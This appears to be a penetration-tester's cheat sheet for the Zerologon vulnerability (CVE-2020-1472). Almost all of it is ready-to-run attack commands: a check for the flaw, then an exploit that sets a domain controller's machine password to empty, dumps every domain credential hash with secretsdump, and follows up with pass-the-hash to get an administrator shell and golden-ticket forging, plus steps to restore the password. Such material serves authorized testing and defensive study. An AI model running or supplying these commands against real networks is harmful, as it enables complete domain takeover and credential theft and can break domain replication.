Overview
CVE-2020-1472. Vulnerability in Netlogon protocol. Reset DC machine account password to empty → DCSync all hashes. Critical severity.
This attack changes the DC machine account password. Can break domain replication. Always restore original hash after exploitation.
Check Vulnerability
crackmapexec smb DC_IP -u '' -p '' -M zerologon
# https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py DC_HOSTNAME DC_IP
Exploit
Set Password to Empty
# https://github.com/dirkjanm/CVE-2020-1472
python3 cve-2020-1472-exploit.py DC_HOSTNAME DC_IP
DCSync with Empty Password
impacket-secretsdump -no-pass -just-dc DOMAIN/'DC_HOSTNAME$'@DC_IP
Restore Machine Account Password
Get Original Hash First (From DCSync Output)
# Note the DC machine account hash from secretsdump output
# DC_HOSTNAME$:NTLM_HASH
Restore
# https://github.com/dirkjanm/CVE-2020-1472
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD
Alternative — secretsdump to Get Hex
restorepassword.py -hexpass needs the hex-encoded plaintext machine password, which only comes from a local registry/LSA secrets dump ($MACHINE.ACC). A DCSync (-just-dc-user) returns only the NT hash, which -hexpass cannot use. Run a full secrets dump (no -just-dc* flags):
impacket-secretsdump -no-pass DOMAIN/'DC_HOSTNAME$'@DC_IP
Post-Exploitation
After DCSync:
# PtH as Domain Admin
impacket-psexec DOMAIN/administrator@DC_IP -hashes :NTLM_HASH
# Golden ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN administrator
Quick Reference
| Step | Command |
|---|
| Check | crackmapexec smb DC -M zerologon |
| Exploit | python3 cve-2020-1472-exploit.py DC_NAME DC_IP |
| DCSync | secretsdump -no-pass DOMAIN/'DC$'@DC_IP |
| Restore | python3 restorepassword.py ... |